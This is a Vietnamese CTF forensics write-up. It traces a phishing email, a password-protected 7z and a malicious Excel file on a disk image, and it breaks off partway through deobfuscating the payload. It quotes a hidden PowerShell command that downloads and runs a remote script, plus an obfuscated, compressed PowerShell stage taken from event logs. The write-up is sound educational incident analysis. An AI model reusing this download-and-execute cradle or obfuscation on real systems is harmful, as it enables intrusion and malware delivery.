{%hackmd @themes/dracula %} # Forensics | Category | Challenge Name | Difficulty | | -------- | -------------- | ---------- | | Forensics| HiddenGem Mixtape 1: Initial Access|Medium | | Forensics| HiddenGem Mixtape 2: Credential Access | Hard| | Forensics| HiddenGem Mixtape 3: The Ultimate Goal| Hard| | Forensics| Pretty Good Prank | Medium | | Forensics| 2-layer security | Medium | | Forensics| Stealth | Hard | ## HiddenGem Mixtape 1: Initial Access ### Des :  ### Sol : + Đề cung cấp cho mình 3 file :  + Nhưng đối với bài này thì mình chỉ xài mỗi file zip như trong file note.txt có ghi. + Extract file zip ra mình nhận được 1 file Hard Disk Image => mình dùng cả 2 tool là FTK Imager + Autopsy để phân tích. + Dựa theo mô tả của đề bài thì có 1 file email mà nhân viên đã mở ra để xem được nghi ngờ rằng nó chứa dữ liệu tấn công hệ thống công ty nhưng nó đã bị xóa ngay sau đó. + Bước đầu thì mình sẽ tìm và xem các file liên quan đến `history` để xem các quá trình đã xảy ra. => nhưng nó đã bị xóa sạch vì vậy chỉ có thể tìm xem cái eml kia để xem có hope ko @@. + Theo path `[root]C/Users/IEUser/Documents/Policy... .eml` mình tìm được file eml mà ô nhân viên kia đã mở.  + Theo nội dung eml thì nó chưa 1 txt/html được mã hóa base64 cùng với 1 tệp đính kèm là `Policy.7z` + Đem mã b64 kia decode thì mình nhận được đoạn text : ``` <div style="font-family: Arial; font-size: 14px;"><span style="line-height:1.5"><span>We have just completed the Security Baseline for employees and personal computers due to some information leaks, so it is necessary to update the company's information security policy.</span></span><div style="line-height:1.5"><br></div><div style="line-height:1.5"><span>In order to ensure the Company's internal information security, I request you to read and master the content of the policy</span></div><div style="line-height:1.5"><br></div><div style="line-height:1.5"><span>This is a confidential document, so it should be protected</span></div><span style="line-height:1.5"></span><span style="line-height:1.5">Password is Privacy4411@2023!!!</span><br></div><div style="font-family: Arial; font-size: 14px;"><br></div> <div class="protonmail_signature_block" style="font-family: Arial; font-size: 14px;"> <div class="protonmail_signature_block-user protonmail_signature_block-empty"> </div> <div class="protonmail_signature_block-proton"> Sent with <a target="_blank" href="https://proton.me/" rel="noopener noreferrer">Proton Mail</a> secure email. </div> </div> ```  + Đọc nội dung nó thì mình nhận được pass để mở file 7z kia là `Privacy4411@2023!!!` + Bây giờ điều quan trọng là tìm được file 7z kia. + Mình mount file disk kia bằng FTK xong load nó vào autopsy để phân tích tiếp.  + Tìm được file `Policy.7z` thì mình dùng pass đã kiếm trước để mở khóa thì nhận 1 file xlsx(excel) => mình dùng viruss total để kiểm tra có viruss hay không.  + Ở phần Behavior mình nhận thấy dòng : ``` C:\Windows\System32\cmd.exe CMD.EXE /c powershell.exe -w hidden $e=(New-Object System.Net.WebClient).DownloadString(\"http://172.21.20.96/windowsupdate.ps1\");IEX $e ``` + => Điểm máu chốt của bài đã được hé lộ ở đoạn powershell này. + Hường tìm theo thì ta chỉ cần search keyword là `http://172.21.20.96/windowsupdate.ps1` hoặc nhận dạng được nó thường nằm trong file event log => mà chủ yếu là trong file `Microsoft-Windows-PowerShell%4Operational.evtx` + Theo path `[root]/C/Windows/System32/winevt/logs` mình extract file evtx đã nghi ngờ ra + Ở ID == 4104, có dòng lệnh powershell :  ``` Creating Scriptblock text (1 of 1): & ( $sHEllid[1]+$sheLLiD[13]+'X')( NEW-obJEct Io.cOMPReSSiON.DEFlAteStrEAM( [SyStem.iO.mEMOrySTream] [SysteM.cOnVerT]::FRomBase64STRINg( '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' ) , [sySteM.IO.ComprESsiON.cOmpresSiONMODe]::dEcomPrEss)|fOReach-OBJECt{NEW-obJEct iO.sTReAMrEAder( $_ , [TExT.EncOdiNg]::AscIi)} | fOREacH-obJeCt{$_.reADToend( )}) ScriptBlock ID: c2b56881-f6ae-40c8-b424-d0ab849ad17e Path: ``` + Đem mã base64 + raw inflate kia decode thì mình nhận được :  ``` (New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b16050a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwAMQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQAOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAGUAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4AGEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBhADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQA2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAYwA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkANQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQAYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2ADcAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2AGIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANwBiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcANQBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkAZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADAAYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkADQAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkADEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgBmADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMwBkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQANQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMwAwADIAYQA1ADIAOQA2ADgAOQBmADgANgAwAGUAYwAyAGUANwAyAGUANAA1AGEAZABhAGEAMgA5ADQAZQAxAGUAMgA0ADcAMQAzAGYANAAyADMAYQAzAGMAZgBlAGEANQA0ADQAYQBmADEAZAA1AGYANQBiADQANQA2ADgAZQBhAGYAZQA4ADYAYgBhADgAMgBjADAAZQBjADIAMQAyADQAMgAyADAANAA4ADAAMAAyAGIAMgBiAGQANwBjAGYAYQA3ADIAMABhAGMANgA1AGYAZgA4ADcAZQA2ADcANwA5AGQAMAA2AGEANgBlADkAZgA1AGIAOQA0AGEAMwBiADAANgA4ADMAZAAwADQANQBkAGIAYwBmAGEANwBiADkAMAA1ADgAMABiAGYAYgA1AGEAMgAxAGUAMQA0ADgANgAzADgAYQAwADcANQBlADUAYgA5AGUAYgAxADQANQA2AGQAYgAzADEAZgA0AGQAZQBiADMAZABlADIANQBiAGYANgA5AGUANQA5ADYAYgA4AGEAMgBjADcAYgA5ADUAOAAxAGMAZQAwADcAZAAzADQAMwA0ADIAMwA5ADMAYQAyADUAMQBkADUAYgBlADQANABmADgAMgBiADYAMgA3ADgAYgAxAGMAMQBhAGMANQAyAGQANgBlADcANAA1AGYANAA5ADMAMAA5ADcANwBkAGIAMwA0AGUAYQBjADEANwAwAGUAZQBhADEAZQAzADUAZAA0ADIAYQBjADAAMQA2ADYAOABlADQAMAAxADcANwA4AGUAZABjADgAZAA5AGIAZQA0ADcANgBmADAANwBiADgAOAA4ADIAYgA4AGIAYwA2ADgAZQA3ADgAYQA2AGQAMwAzAGMAZQBlAGUANQAzADIAZQBkAGMAYQBhADkANwBhAGEAOAAwADEAZgA0ADEAMwAxADAAYwA2AGEAZgBmAGMAZgBlADEAYQA5ADcAOAAxADEAOQAwADEAYwBkADIAOQAwAGYANgBhADkAYwBlAGQAYQBmADYAYwBmADYAOAA1ADMAMAAxADQANgA2ADUAZABhADMAYgAwADEAZQAwADgAMwAxADMAMgA5ADYAOQA1AGYANAAwADgAOABjAGYANABmAGEAMgAxADQAZQA3ADUAMgA2ADQAOABhAGMAYgBlADAAYgA2ADcAYwAyAGMAOQA0AGIAMwBlAGIANAAxADkAMwAyAGIAZQBhADMANQA4AGUAOQBkAGQANQA3AGUAYgAyADcAZABmADQAZQBiADQAOQBmADQAMAA5AGEAOABhADYAOABhAGIAZQBlADAAYQA2ADUAZgA3ADEANQBkADIANABiADcAYwAxAGIANQAwADgAZQBlAGUAMQBjAGEANAA1ADYAMgBiAGYAMwA4ADAAMwBiADIAZgAwADAAYQAxADEAOAAwADQAYgA3ADcAMwBhADEANABkAGQANQA1ADQAZgA1AGMAMAA5ADQAOQA0ADAAZgA3AGIAMwA3AGIAMwAxADAAZQBjADQAYQA3ADYAMQBkADQAOQA3AGEAOABiAGYAZgBhAGMAZQAyADAAMgA3ADIAOQAxADIAZgBhADQAYwBhADkAYwA4ADAANwA0ADUANwAyADgAZQAzADUAMQBlADIAMgA1ADYAMAAwADAAOAAyAGIAYQA4AGYAZQBiAGEAMAA3AGYAMgBjAGIANgBkAGMAZgAxAGIAYgA4ADEAMgA4ADAANQA3ADMANAA3ADcAOQA5AGUANQA2ADUAMQAwAGQANAA1AGYANQAyAGQAYwBiADUAZgAzADgAMABmADIANwAxAGMAZQBhAGYAOABiADUANQBiAGQAZgBkAGMAMABjAGIANwBjADAANAA5AGYAZABkADAAMgAwADAAYwA5ADcAYwA3ADQANwBkADQAYgAwAGYAZABkAGYAMwAzADUAZQAwADgAZAAyADIAYQA4ADQAOQBlADgAZgBjAGMAMgAzADcANAAyADcAZgBhADMAZgA4ADUAMgBhADAANQAxADkAYgAyAGQAYwBjADQAOQA1ADUANwAwADUAYgA0ADgAOQBkADEAYwAzADgAMAA3ADUAOAA5AGEAYQBiADYAZQA5ADEAYQAxADMAMgBkADYAZAA5ADYAMQAzAGQAZAA2AGYANQAyAGQANgA1ADIAMAA5ADUAYgA2AGEAZQBjADkAMQBhAGIANQAyADUAMwA5ADQAMAAyADUAOQA0ADgAZgBmADgANAAwADYAMwBmAGIAMAA4AGQAZgA0ADUAYwAyAGQAOQAwADYANgA5ADkAOABiAGYANAA1ADYAMQAyADUANQA1ADAAYwAzADUAYgAwAGQAMgA0ADUAZAA0AGUAYwAyAGYAMABkADAAOAA1ADgAYgA0ADcANAA1ADIAMAAwADIANwBlADYAYgA2ADUAOABlADMAYgA3ADYAYgBmAGQANQA2ADYAZAAyADYAYwA4ADcANQAzADcAOABjAGMAMQBlADQANABmAGUAOQBhADUAYQBlADkAZABkAGMANQA2ADAAMQBmADYAMAAxADEAOQA3AGIAYwBiAGUANwA2ADIAZAA4ADkAYQA4AGEAMgBlAGQAMgA4ADQANAA4ADcANAA4AGEAYgA0AGIAMgA5ADgAOQBhAGUAMQAzADUAMwBkADMAMAA5ADMANQA1ADMAMQAyADEAYQBhADkAOAA2ADgAOQBlAGEANwA2ADIANAA3ADgAOQAzAGEAYwA0ADkAYgBhAGMAMwBmAGQAZABiADYAZgA3ADAAZABkADIAMQA3ADAAYQA4ADQAOQBlADYANgAxADkAYQA3ADMAMgA0ADgAOQA2ADcAOQBkADEAYQBmAGYANwAzADcAYgA0ADAANgAzADgAZAA1AGYAZgBkADgAOQBjAGIAZgA4ADYAOAAwADcAOQBkADYAMAAxADYAMgBmADcANAAwAGUAOAA4ADYANQAzAGYAMwA5ADMAZQAxADYAMgBmADIAZABjAGEAMAA3ADIAMAA1AGQAYQA5AGYAOABkADMAZAA2AGYAMgAxAGQAYwA0ADAAMgAwADMANQA4AGUAYQBiADYAMQBlAGQAMAA3ADcAYQBlADgAOQBiADEANQA1ADQAZAA1ADgAMQA3ADQAMwBjAGYANQAxAGUAMQAyAGIAZQBjADIAYgBmADIAZgBlADUANAA3ADQAYQA5ADAANwBjADQANgA0AGEAYQAwADMAZAA0AGEAZQA1AGMAZgAzAGMAYgBlAGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiAGQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQA3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZgA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQAZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADAAZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyADIAMQA1ADEAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzADMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQBiADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYgAyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZgAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUANwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADgAZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlADcAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiADMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABlAGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOABlADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMwAxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAMwAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYAYwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADMAYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3ADEANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhADQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBhAGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQAyAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANABjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZAAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUANQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).GetneTwoRKCrEDEnTIAl().pASsWoRD |. ( $PsHoME[21]+$psHOme[34]+'x') ``` + Cách 1 : + Đến đây thì phân tích 1 chút(này mình nhờ chatGPT) => nhận biết được `$PsHoME[21]+$psHOme[34]+'x'` <=> `echo` => ta chỉ cần khúc `|. ( $PsHoME[21]+$psHOme[34]+'x')` và thay echo vào đầu lệnh là được. ``` echo (New-OBJECT MAnAGeMent.AUtOmaTiON.PsCreDEntIAL ' ', ('76492d1116743f0423413b16050a5345MgB8AHUAQgAxAEsAZQBQAE8AUQA4AHQAVAB5ADEAcwBXAFYALwBVADcAUAAyAGcAPQA9AHwAMQAzADcAMwAwAGIAOQA2ADMANQAwAGYAOABlADUAOQAxAGEAMgA4ADAAOQAzAGQAMABjADYAZgA2ADQAOAAxAGYAZAA4AGUAMAA2ADIANABmADQAMgAzADMAYwAxAGQANgA4ADEANgAwADcANgA1AGYANgBjAGUAZQA1ADAAMwA4ADMAZQA5AGMAOQAzAGUAYgBhAGIANgA1ADEANQBjAGYAYwBiADIAOQA2ADcAYgA4AGEAZAA3AGYANABhAGYAYgA2ADgANQAyADkAOAA1ADUAYQA2ADkAMwAzADMANwBkADIAOQA1ADkAZgBhADkANAA1AGYANwA1ADIAZAA2AGMAMgBhADYANQBjADAAYwA4AGEAYQA0AGYAZQBiAGUAYgA2AGQAOQA4AGIAOAA1AGYAZAA1ADMANgBkADYANQBkADMAZQBiADAANQBjADkAMABmADMANQA0AGYAOQBiADMAMQA2ADkAOQAyADcAZgA2ADcAZgBiADAAYQAxAGYANAAzAGIAYQBjADQANwA2ADgAYwA4ADYAOAA2ADcAYwA2ADAAZABkADkAOQAwADAAYgAzADYAMgA2ADUAZQA0AGYANAA2AGEAYgAwAGMAOAAwADAANQA4ADkANQBlAGYAYwBhADkANAAwADEANgBkADgAMwAzAGEAYQBlADMAMgAxAGEAMQBiADAAMwAwADQANQA1ADQAYQAzADIAYwA4AGQAZQBkADUAZABlAGIAMwA2ADgAYgA4AGYANAAyADUAZAAxADIAOAA0AGYANwA2ADcAMABjADMAOAA1ADMAMwAyADkAZQA2AGEANwBmADAAZAA2ADUAMwBkADkAYgAzADcAMgA4ADEAZAA2AGIANwAwADUAYwA0ADMAYQAwAGUAZgA0ADYAZQBiADkAYgA5ADcANQA5ADkAYQA0ADEAMgBhADQAYQA4ADYAMQBhADIAYgA4ADcANwAzADIAMABjADIAMQA3ADgAYwA0ADIAYwA0ADYAZgAwAGIANQBmAGEAYQA3AGIANQBlADMANgAwAGEANwAwAGMAMgBlADgAYQA5ADAAYwBlADkAMgBjADgAMgA3ADIAMAA4ADMANwBiAGQANAA1AGYAOQBlADQANABkADkAMgBiADAAZQBiADgAYgA4ADQAZQA2AGQANgBlADAAYgA5ADcANQBhAGQAYQA2ADMAZgAwADcAMAA3ADcAYgA5AGYAYwAxADcANQBjADUANgAwAGMAZQA4ADYAZAA4ADkAZABhADgAOQA1AGQAMQA5AGEAMQAzADUANgAxADUAMAAyAGQANgA2AGMAZQBmAGQAYwBlADUAMABiADAAYQA5ADIAOABlADMAZABkAGUANAAzADIAZgAwAGEANgA3ADkANQA3ADYANgA3ADIAOQBjAGUANgBkADQAZAAwAGUAZAAwADgAZAA5ADQANgBlADYAMwAyADIANQAyADkANABmADgAYwA5ADkAMAA0AGQAZgBkADEAYwAxAGUAOQAxADcAZgAyAGMANQBkAGYAMwAzADMANgBlAGEAZgBmAGMANgBjAGMAZABkAGQAMAA5ADAAZQAzADQAZAAwADYAZAAyADUAMwA2AGMANgA2ADAANAAyADUANgA2ADUAYwA0ADQAZQAyADIAMgBmADAANQAyAGEAYwA5ADAAZAAzADYAZAAzAGYAYQA2AGEAOAA0ADIAOQAwADAAMQAwAGYAOQBhADAAMwBkAGYAMQBiAGMANgAwAGMAZAA4ADEANAA5AGEAMwAyAGQAOQBlADcANwBkADEAYQBiADUANQA0ADIAZABhADQANwBmADAAYQA2ADYAMAAyADEANABmADAAMgAyAGEAMQAxAGQANgBjADgAOQA2ADYAYgA1AGQANQAwADIAMwBiADQANwAxADkAZgA5AGIANAA4AGQAYwAwADAANABiADIANgA2ADEAMw